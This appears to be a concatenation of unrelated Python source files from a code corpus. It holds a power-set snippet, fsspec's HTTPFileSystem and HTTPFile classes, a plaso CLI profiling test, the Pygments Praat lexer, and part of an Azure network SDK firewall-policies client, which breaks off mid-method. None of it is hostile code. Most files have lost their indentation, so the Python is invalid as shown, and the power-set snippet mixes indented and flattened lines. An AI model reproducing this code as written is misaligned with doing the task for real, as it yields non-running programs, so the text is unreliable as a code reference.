class Solution:
    def XXX(self, nums: List[int]) -> List[List[int]]:
        # Build the power set: for each element, duplicate every subset found
        # so far and append the element to the copies.
        res = [[]]
for i in nums:
tem = deepcopy(res)
for j in range(len(tem)):
tem[j].append(i)
res.extend(tem)
return res
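
# Quick sanity check (the method name was anonymized to XXX in this snippet):
if __name__ == '__main__':
    print(Solution().XXX([1, 2, 3]))
    # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3]]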
|
py | 1a38a9d12e211a21d385cfef7d206b2371a6537d | from __future__ import print_function, division, absolute_import
import re
import requests
from fsspec import AbstractFileSystem
from fsspec.utils import tokenize, DEFAULT_BLOCK_SIZE
# https://stackoverflow.com/a/15926317/3821154
ex = re.compile(r"""<a\s+(?:[^>]*?\s+)?href=(["'])(.*?)\1""")
ex2 = re.compile(r"""(http[s]?://[-a-zA-Z0-9@:%_+.~#?&/=]+)""")
class HTTPFileSystem(AbstractFileSystem):
"""
Simple File-System for fetching data via HTTP(S)
``ls()`` is implemented by loading the parent page and doing a regex
    match on the result. If simple_links=True, anything that looks like a URL
    (e.g. "http(s)://server.com/stuff?thing=other") will also be considered;
    otherwise only links within HTML href tags will be used.
"""
sep = '/'
def __init__(self, **storage_options):
"""
Parameters
----------
        block_size: int
            Block size (in bytes) used for read-ahead; if 0, raw ``requests``
            file-like objects will be returned instead of HTTPFile instances
simple_links: bool
If True, will consider both HTML <a> tags and anything that looks
like a URL; if False, will consider only the former.
storage_options: key-value
May be credentials, e.g., `{'auth': ('username', 'pword')}` or any
other parameters passed on to requests
"""
AbstractFileSystem.__init__(self)
self.block_size = storage_options.pop('block_size', DEFAULT_BLOCK_SIZE)
self.simple_links = storage_options.pop('simple_links', True)
self.kwargs = storage_options
self.session = requests.Session()
def _strip_protocol(self, path):
""" For HTTP, we always want to keep the full URL
"""
return path
def ls(self, url, detail=True):
# ignoring URL-encoded arguments
r = requests.get(url, **self.kwargs)
if self.simple_links:
links = ex2.findall(r.text) + ex.findall(r.text)
else:
links = ex.findall(r.text)
out = set()
for l in links:
if isinstance(l, tuple):
l = l[1]
if l.startswith('http'):
if l.replace('https', 'http').startswith(
url.replace('https', 'http')):
out.add(l)
else:
if l not in ['..', '../']:
# Ignore FTP-like "parent"
out.add('/'.join([url.rstrip('/'), l.lstrip('/')]))
if detail:
return [{'name': u, 'type': 'directory'
if u.endswith('/') else 'file'} for u in out]
else:
return list(sorted(out))
def cat(self, url):
r = requests.get(url, **self.kwargs)
r.raise_for_status()
return r.content
def mkdirs(self, url):
"""Make any intermediate directories to make path writable"""
raise NotImplementedError
def _open(self, url, mode='rb', block_size=None, **kwargs):
"""Make a file-like object
Parameters
----------
url: str
Full URL with protocol
mode: string
must be "rb"
block_size: int or None
Bytes to download in one request; use instance value if None.
kwargs: key-value
Any other parameters, passed to requests calls
"""
if mode != 'rb':
raise NotImplementedError
block_size = block_size if block_size is not None else self.block_size
kw = self.kwargs.copy()
kw.update(kwargs)
kw.pop('autocommit', None)
if block_size:
return HTTPFile(url, self.session, block_size, **kw)
else:
kw['stream'] = True
r = self.session.get(url, **kw)
r.raise_for_status()
r.raw.decode_content = True
return r.raw
def ukey(self, url):
"""Unique identifier; assume HTTP files are static, unchanging"""
return tokenize(url, self.kwargs, self.protocol)
def size(self, url):
"""Size in bytes of the file at path"""
return file_size(url, session=self.session, **self.kwargs)
class HTTPFile(object):
"""
    A file-like object pointing to a remote HTTP(S) resource
    Supports only reading, with read-ahead of a predetermined block-size.
In the case that the server does not supply the filesize, only reading of
the complete file in one go is supported.
Parameters
----------
url: str
Full URL of the remote resource, including the protocol
session: requests.Session or None
All calls will be made within this session, to avoid restarting
connections where the server allows this
block_size: int or None
The amount of read-ahead to do, in bytes. Default is 5MB, or the value
configured for the FileSystem creating this file
    kwargs: all other key-values are passed to requests calls.
"""
def __init__(self, url, session=None, block_size=None, **kwargs):
self.url = url
self.kwargs = kwargs
self.loc = 0
self.session = session if session is not None else requests.Session()
self.blocksize = (block_size if block_size is not None
else DEFAULT_BLOCK_SIZE)
try:
self.size = file_size(url, self.session, allow_redirects=True,
**self.kwargs)
except (ValueError, requests.HTTPError):
# No size information - only allow read() and no seek()
self.size = None
self.cache = None
self.closed = False
self.start = None
self.end = None
def seek(self, where, whence=0):
"""Set file position
Parameters
----------
where: int
Location to set
whence: int (default 0)
If zero, set from start of file (value should be positive); if 1,
set relative to current position; if 2, set relative to end of file
            (value should be negative)
Returns the position.
"""
if self.size is None and (where, whence) not in [(0, 0), (0, 1)]:
raise ValueError('Cannot seek since size of file is not known')
if whence == 0:
nloc = where
elif whence == 1:
nloc = self.loc + where
elif whence == 2:
nloc = self.size + where
else:
            raise ValueError('Whence must be in [0, 1, 2], but got %s' % whence)
if nloc < 0:
raise ValueError('Seek before start of file')
self.loc = nloc
return nloc
def tell(self):
"""Get current file byte position"""
return self.loc
def read(self, length=-1):
"""Read bytes from file
Parameters
----------
length: int
Read up to this many bytes. If negative, read all content to end of
file. If the server has not supplied the filesize, attempting to
read only part of the data will raise a ValueError.
"""
if length == 0:
# asked for no data, so supply no data and shortcut doing work
return b''
if self.size is None:
if length >= 0:
# asked for specific amount of data, but we don't know how
# much is available
raise ValueError('File size is unknown, must read all data')
else:
# asked for whole file
return self._fetch_all()
if length < 0 and self.loc == 0:
# size was provided, but asked for whole file, so shortcut
return self._fetch_all()
if length < 0 or self.loc + length > self.size:
end = self.size
else:
end = self.loc + length
if self.loc >= self.size:
# EOF (python files don't error, just return no data)
return b''
        self._fetch(self.loc, end)
data = self.cache[self.loc - self.start:end - self.start]
self.loc = end
return data
def _fetch(self, start, end):
"""Set new bounds for data cache and fetch data, if required"""
if self.start is None and self.end is None:
# First read
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(start, self.end)
elif start < self.start:
if self.end - end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(start, self.start)
self.start = start
self.cache = new + self.cache
elif end > self.end:
if self.end > self.size:
return
if end - self.end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(self.end, end + self.blocksize)
self.end = end + self.blocksize
self.cache = self.cache + new
def _fetch_all(self):
"""Read whole file in one shot, without caching
This is only called when size is None or position is still at zero,
and read() is called without a byte-count.
"""
r = self.session.get(self.url, **self.kwargs)
r.raise_for_status()
out = r.content
        # set position to end of data; the file is typically closed shortly after
        l = len(out)
if l < self.blocksize:
# actually all data fits in one block, so cache
self.start = 0
self.end = l
self.cache = out
self.size = l
self.loc = len(out)
return out
def _fetch_range(self, start, end):
"""Download a block of data
The expectation is that the server returns only the requested bytes,
with HTTP code 206. If this is not the case, we first check the headers,
and then stream the output - if the data size is bigger than we
requested, an exception is raised.
"""
kwargs = self.kwargs.copy()
headers = self.kwargs.pop('headers', {})
headers['Range'] = 'bytes=%i-%i' % (start, end - 1)
r = self.session.get(self.url, headers=headers, stream=True, **kwargs)
r.raise_for_status()
if r.status_code == 206:
# partial content, as expected
return r.content
if 'Content-Length' in r.headers:
cl = int(r.headers['Content-Length'])
if cl <= end - start:
# data size OK
return r.content
else:
raise ValueError('Got more bytes (%i) than requested (%i)' % (
cl, end - start))
cl = 0
out = []
for chunk in r.iter_content(chunk_size=2 ** 20):
# data size unknown, let's see if it goes too big
if chunk:
out.append(chunk)
cl += len(chunk)
if cl > end - start:
raise ValueError(
'Got more bytes so far (>%i) than requested (%i)' % (
cl, end - start))
else:
break
return b''.join(out)
def __enter__(self):
self.loc = 0
return self
def __exit__(self, *args):
self.close()
def __iter__(self):
# no text lines here, use TextIOWrapper
raise NotImplementedError
def write(self):
raise NotImplementedError
def flush(self):
pass
def close(self):
self.closed = True
def seekable(self):
return True
def writable(self):
return False
def readable(self):
return True
def file_size(url, session, **kwargs):
"""Call HEAD on the server to get file size
Default operation is to explicitly allow redirects and use encoding
'identity' (no compression) to get the true size of the target.
"""
kwargs = kwargs.copy()
ar = kwargs.pop('allow_redirects', True)
head = kwargs.get('headers', {})
if 'Accept-Encoding' not in head:
head['Accept-Encoding'] = 'identity'
r = session.head(url, allow_redirects=ar, **kwargs)
r.raise_for_status()
if 'Content-Length' in r.headers:
return int(r.headers['Content-Length'])
else:
raise ValueError("Server did not supply size of %s" % url)
|
py | 1a38a9dc7ac77059d22ee812ffd5f4ef34dc1e11 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the profiling CLI arguments helper."""
from __future__ import unicode_literals
import argparse
import unittest
from plaso.cli import tools
from plaso.cli.helpers import profiling
from plaso.lib import errors
from tests import test_lib as shared_test_lib
from tests.cli import test_lib as cli_test_lib
class ProfilingArgumentsHelperTest(cli_test_lib.CLIToolTestCase):
"""Tests for the profiling CLI arguments helper."""
# pylint: disable=protected-access
_EXPECTED_OUTPUT = """\
usage: cli_helper.py [--profilers PROFILERS_LIST]
[--profiling_directory DIRECTORY]
[--profiling_sample_rate SAMPLE_RATE]
Test argument parser.
optional arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma
separated list where each entry is the name of a
profiler. Use "--profilers list" to list the available
profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the
profiling sample files. By default the sample files
are stored in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000
files).
"""
def testAddArguments(self):
"""Tests the AddArguments function."""
argument_parser = argparse.ArgumentParser(
prog='cli_helper.py', description='Test argument parser.',
add_help=False,
formatter_class=cli_test_lib.SortedArgumentsHelpFormatter)
profiling.ProfilingArgumentsHelper.AddArguments(argument_parser)
output = self._RunArgparseFormatHelp(argument_parser)
self.assertEqual(output, self._EXPECTED_OUTPUT)
def testParseOptions(self):
"""Tests the ParseOptions function."""
# pylint: disable=no-member
test_tool = tools.CLITool()
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = '100'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profiling_sample_rate, 100)
with shared_test_lib.TempDirectory() as temp_directory:
options = cli_test_lib.TestOptions()
options.profilers = 'processing'
options.profiling_directory = temp_directory
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profilers, set(['processing']))
self.assertEqual(test_tool._profiling_directory, temp_directory)
self.assertEqual(test_tool._profiling_sample_rate, 1000)
with self.assertRaises(errors.BadConfigObject):
options = cli_test_lib.TestOptions()
profiling.ProfilingArgumentsHelper.ParseOptions(options, None)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profilers = 'bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_directory = '/bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 'a'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 100
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
if __name__ == '__main__':
unittest.main()
|
py | 1a38a9e8f75abbd74946ae4fca630d7dcf3316df | # -*- coding: utf-8 -*-
"""
pygments.lexers.praat
~~~~~~~~~~~~~~~~~~~~~
Lexer for Praat
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, words, bygroups, include
from pygments.token import Name, Text, Comment, Keyword, String, Punctuation, Number, \
Operator
__all__ = ['PraatLexer']
class PraatLexer(RegexLexer):
"""
For `Praat <http://www.praat.org>`_ scripts.
.. versionadded:: 2.1
"""
name = 'Praat'
aliases = ['praat']
filenames = ['*.praat', '*.proc', '*.psc']
keywords = (
'if', 'then', 'else', 'elsif', 'elif', 'endif', 'fi', 'for', 'from', 'to',
'endfor', 'endproc', 'while', 'endwhile', 'repeat', 'until', 'select', 'plus',
'minus', 'demo', 'assert', 'stopwatch', 'nocheck', 'nowarn', 'noprogress',
'editor', 'endeditor', 'clearinfo',
)
functions_string = (
'backslashTrigraphsToUnicode', 'chooseDirectory', 'chooseReadFile',
'chooseWriteFile', 'date', 'demoKey', 'do', 'environment', 'extractLine',
'extractWord', 'fixed', 'info', 'left', 'mid', 'percent', 'readFile', 'replace',
'replace_regex', 'right', 'selected', 'string', 'unicodeToBackslashTrigraphs',
)
functions_numeric = (
'abs', 'appendFile', 'appendFileLine', 'appendInfo', 'appendInfoLine', 'arccos',
'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctan2', 'arctanh', 'barkToHertz',
'beginPause', 'beginSendPraat', 'besselI', 'besselK', 'beta', 'beta2',
'binomialP', 'binomialQ', 'boolean', 'ceiling', 'chiSquareP', 'chiSquareQ',
'choice', 'comment', 'cos', 'cosh', 'createDirectory', 'deleteFile',
'demoClicked', 'demoClickedIn', 'demoCommandKeyPressed',
'demoExtraControlKeyPressed', 'demoInput', 'demoKeyPressed',
'demoOptionKeyPressed', 'demoShiftKeyPressed', 'demoShow', 'demoWaitForInput',
'demoWindowTitle', 'demoX', 'demoY', 'differenceLimensToPhon', 'do', 'editor',
'endPause', 'endSendPraat', 'endsWith', 'erb', 'erbToHertz', 'erf', 'erfc',
'exitScript', 'exp', 'extractNumber', 'fileReadable', 'fisherP', 'fisherQ',
'floor', 'gaussP', 'gaussQ', 'hertzToBark', 'hertzToErb', 'hertzToMel',
'hertzToSemitones', 'imax', 'imin', 'incompleteBeta', 'incompleteGammaP', 'index',
'index_regex', 'invBinomialP', 'invBinomialQ', 'invChiSquareQ', 'invFisherQ',
'invGaussQ', 'invSigmoid', 'invStudentQ', 'length', 'ln', 'lnBeta', 'lnGamma',
'log10', 'log2', 'max', 'melToHertz', 'min', 'minusObject', 'natural', 'number',
'numberOfColumns', 'numberOfRows', 'numberOfSelected', 'objectsAreIdentical',
'option', 'optionMenu', 'pauseScript', 'phonToDifferenceLimens', 'plusObject',
'positive', 'randomBinomial', 'randomGauss', 'randomInteger', 'randomPoisson',
'randomUniform', 'real', 'readFile', 'removeObject', 'rindex', 'rindex_regex',
'round', 'runScript', 'runSystem', 'runSystem_nocheck', 'selectObject',
'selected', 'semitonesToHertz', 'sentencetext', 'sigmoid', 'sin', 'sinc',
'sincpi', 'sinh', 'soundPressureToPhon', 'sqrt', 'startsWith', 'studentP',
'studentQ', 'tan', 'tanh', 'variableExists', 'word', 'writeFile', 'writeFileLine',
'writeInfo', 'writeInfoLine',
)
functions_array = (
'linear', 'randomGauss', 'randomInteger', 'randomUniform', 'zero',
)
objects = (
'Activation', 'AffineTransform', 'AmplitudeTier', 'Art', 'Artword',
'Autosegment', 'BarkFilter', 'BarkSpectrogram', 'CCA', 'Categories',
'Cepstrogram', 'Cepstrum', 'Cepstrumc', 'ChebyshevSeries', 'ClassificationTable',
'Cochleagram', 'Collection', 'ComplexSpectrogram', 'Configuration', 'Confusion',
'ContingencyTable', 'Corpus', 'Correlation', 'Covariance',
'CrossCorrelationTable', 'CrossCorrelationTables', 'DTW', 'DataModeler',
'Diagonalizer', 'Discriminant', 'Dissimilarity', 'Distance', 'Distributions',
'DurationTier', 'EEG', 'ERP', 'ERPTier', 'EditCostsTable', 'EditDistanceTable',
'Eigen', 'Excitation', 'Excitations', 'ExperimentMFC', 'FFNet', 'FeatureWeights',
'FileInMemory', 'FilesInMemory', 'Formant', 'FormantFilter', 'FormantGrid',
'FormantModeler', 'FormantPoint', 'FormantTier', 'GaussianMixture', 'HMM',
'HMM_Observation', 'HMM_ObservationSequence', 'HMM_State', 'HMM_StateSequence',
'Harmonicity', 'ISpline', 'Index', 'Intensity', 'IntensityTier', 'IntervalTier',
'KNN', 'KlattGrid', 'KlattTable', 'LFCC', 'LPC', 'Label', 'LegendreSeries',
'LinearRegression', 'LogisticRegression', 'LongSound', 'Ltas', 'MFCC', 'MSpline',
'ManPages', 'Manipulation', 'Matrix', 'MelFilter', 'MelSpectrogram',
'MixingMatrix', 'Movie', 'Network', 'OTGrammar', 'OTHistory', 'OTMulti', 'PCA',
'PairDistribution', 'ParamCurve', 'Pattern', 'Permutation', 'Photo', 'Pitch',
'PitchModeler', 'PitchTier', 'PointProcess', 'Polygon', 'Polynomial',
'PowerCepstrogram', 'PowerCepstrum', 'Procrustes', 'RealPoint', 'RealTier',
'ResultsMFC', 'Roots', 'SPINET', 'SSCP', 'SVD', 'Salience', 'ScalarProduct',
'Similarity', 'SimpleString', 'SortedSetOfString', 'Sound', 'Speaker',
'Spectrogram', 'Spectrum', 'SpectrumTier', 'SpeechSynthesizer', 'SpellingChecker',
'Strings', 'StringsIndex', 'Table', 'TableOfReal', 'TextGrid', 'TextInterval',
'TextPoint', 'TextTier', 'Tier', 'Transition', 'VocalTract', 'VocalTractTier',
'Weight', 'WordList',
)
variables_numeric = (
'macintosh', 'windows', 'unix', 'praatVersion', 'pi', 'e', 'undefined',
)
variables_string = (
'praatVersion', 'tab', 'shellDirectory', 'homeDirectory',
'preferencesDirectory', 'newline', 'temporaryDirectory',
'defaultDirectory',
)
tokens = {
'root': [
(r'(\s+)(#.*?$)', bygroups(Text, Comment.Single)),
(r'^#.*?$', Comment.Single),
(r';[^\n]*', Comment.Single),
(r'\s+', Text),
(r'\bprocedure\b', Keyword, 'procedure_definition'),
(r'\bcall\b', Keyword, 'procedure_call'),
(r'@', Name.Function, 'procedure_call'),
include('function_call'),
(words(keywords, suffix=r'\b'), Keyword),
(r'(\bform\b)(\s+)([^\n]+)',
bygroups(Keyword, Text, String), 'old_form'),
(r'(print(?:line|tab)?|echo|exit|asserterror|pause|send(?:praat|socket)|'
r'include|execute|system(?:_nocheck)?)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(goto|label)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
include('variable_name'),
include('number'),
(r'"', String, 'string'),
            (words(objects, suffix=r'(?=\s+\S+\n)'), Name.Class, 'string_unquoted'),
(r'\b[A-Z]', Keyword, 'command'),
(r'(\.{3}|[)(,])', Punctuation),
],
'command': [
(r'( ?[\w()-]+ ?)', Keyword),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r'\.{3}', Keyword, ('#pop', 'old_arguments')),
(r':', Keyword, ('#pop', 'comma_list')),
(r'\s', Text, '#pop'),
],
'procedure_call': [
(r'\s+', Text),
(r'([\w.]+)(:|\s*\()',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)', Name.Function, ('#pop', 'old_arguments')),
],
'procedure_definition': [
(r'\s', Text),
(r'([\w.]+)(\s*?[(:])',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)([^\n]*)',
bygroups(Name.Function, Text), '#pop'),
],
'function_call': [
(words(functions_string, suffix=r'\$(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_array, suffix=r'#(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_numeric, suffix=r'(?=\s*[:(])'), Name.Function, 'function'),
],
'function': [
(r'\s+', Text),
(r':', Punctuation, ('#pop', 'comma_list')),
(r'\s*\(', Punctuation, ('#pop', 'comma_list')),
],
'comma_list': [
(r'(\s*\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'(\s*[])\n])', Text, '#pop'),
(r'\s+', Text),
(r'"', String, 'string'),
(r'\b(if|then|else|fi|endif)\b', Keyword),
include('function_call'),
include('variable_name'),
include('operator'),
include('number'),
(r'[()]', Text),
(r',', Punctuation),
],
'old_arguments': [
(r'\n', Text, '#pop'),
include('variable_name'),
include('operator'),
include('number'),
(r'"', String, 'string'),
(r'[^\n]', Text),
],
'number': [
(r'\n', Text, '#pop'),
(r'\b\d+(\.\d*)?([eE][-+]?\d+)?%?', Number),
],
'object_attributes': [
(r'\.?(n(col|row)|[xy]min|[xy]max|[nd][xy])\b', Name.Builtin, '#pop'),
(r'(\.?(?:col|row)\$)(\[)',
bygroups(Name.Builtin, Text), 'variable_name'),
(r'(\$?)(\[)',
bygroups(Name.Builtin, Text), ('#pop', 'comma_list')),
],
'variable_name': [
include('operator'),
include('number'),
(words(variables_string, suffix=r'\$'), Name.Variable.Global),
(words(variables_numeric, suffix=r'\b'), Name.Variable.Global),
(r'\bObject_\w+', Name.Builtin, 'object_attributes'),
(words(objects, prefix=r'\b', suffix=r'_\w+'),
Name.Builtin, 'object_attributes'),
(r"\b(Object_)(')",
bygroups(Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(words(objects, prefix=r'\b', suffix=r"(_)(')"),
bygroups(Name.Builtin, Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(r'\.?_?[a-z][\w.]*(\$|#)?', Text),
(r'[\[\]]', Punctuation, 'comma_list'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
],
'operator': [
(r'([+\/*<>=!-]=?|[&*|][&*|]?|\^|<>)', Operator),
(r'(?<![\w.])(and|or|not|div|mod)(?![\w.])', Operator.Word),
],
'string_interpolated': [
(r'\.?[_a-z][\w.]*[$#]?(?:\[[a-zA-Z0-9,]+\])?(:[0-9]+)?',
String.Interpol),
(r"'", String.Interpol, '#pop'),
],
'string_unquoted': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'\n', Text, '#pop'),
(r'\s', Text),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r"[^'\n]+", String),
],
'string': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'"', String, '#pop'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r'[^\'"\n]+', String),
],
'old_form': [
(r'\s+', Text),
(r'(optionmenu|choice)([ \t]+\S+:[ \t]+)',
bygroups(Keyword, Text), 'number'),
(r'(option|button)([ \t]+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(sentence|text)([ \t]+\S+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(word)([ \t]+\S+[ \t]*)(\S+)?([ \t]+.*)?',
bygroups(Keyword, Text, String, Text)),
(r'(boolean)(\s+\S+\s*)(0|1|"?(?:yes|no)"?)',
bygroups(Keyword, Text, Name.Variable)),
            # Ideally processing of the number would happen in the 'number'
            # state, but that doesn't seem to work
(r'(real|natural|positive|integer)([ \t]+\S+[ \t]*)([+-]?)(\d+(?:\.\d*)?'
r'(?:[eE][-+]?\d+)?%?)',
bygroups(Keyword, Text, Operator, Number)),
(r'(comment)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'\bendform\b', Keyword, '#pop'),
]
}
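
# A minimal sketch of running this lexer through the standard pygments pipeline:
if __name__ == '__main__':
    from pygments import highlight
    from pygments.formatters import TerminalFormatter

    sample = 'writeInfoLine: "hello"\n'
    print(highlight(sample, PraatLexer(), TerminalFormatter()))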
|
py | 1a38aa10c79eb5a4a18e653b72df109dc75c9770 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class FirewallPoliciesOperations(object):
"""FirewallPoliciesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified Firewall Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param firewall_policy_name: The name of the Firewall Policy.
:type firewall_policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
firewall_policy_name=firewall_policy_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallPolicy"
"""Gets the specified Firewall Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param firewall_policy_name: The name of the Firewall Policy.
:type firewall_policy_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_06_01.models.FirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
